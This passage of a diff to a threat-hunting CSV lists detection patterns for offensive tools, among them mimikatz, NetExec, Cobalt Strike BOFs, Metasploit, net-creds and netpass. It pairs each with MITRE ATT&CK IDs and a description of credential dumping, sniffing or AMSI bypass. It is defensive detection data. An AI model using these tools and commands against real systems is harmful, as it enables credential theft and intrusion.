TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::if*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::serverinfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::session*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::share*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::stats*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::tod*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::user*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::wsession*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*net_dclist *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*net_localgroup_member -Group*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*net_portscan.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" -"*net_recon.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - 
TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","0","N/A","N/A","10","1560","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" +"*net_recon.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. 
Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","0","N/A","N/A","10","1562","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" "*netero1010/Quser-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*netero1010/ScheduleRunner*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" 
"*netero1010/ServiceMove-BOF*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" -"*NetExec ldap * --*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*NetExec ldap * --dc-ip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*NetExec ldap * -M enum_trusts*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*NetExec winrm *--*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*NetExec ldap * --*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec ldap * --dc-ip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 
- TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec ldap * -M enum_trusts*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec winrm *--*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Net-GPPPassword.cs*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. 
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword.exe*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword_dotNET*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" 
@@ -14008,47 +14169,47 @@ "*nethunter-*.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nethunter-*.zip*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nethunter-*-oos-ten-kalifs-full.zip*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*netlm_downgrade.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*NETLMv2_fmt_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*netlm_downgrade.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NETLMv2_fmt_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*NetLoader.exe --path *.exe *","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*NetLoader-master*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*netloggedonusers.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*netlogon_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*netntlm.pl *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*netntlm.pl *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*NetNTLMtoSilverTicket.git*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*NetNTLMtoSilverTicket-master*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*netpass.exe*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. 
as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netpass.zip*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netpass_x64.exe*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netpass-x64.zip*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. 
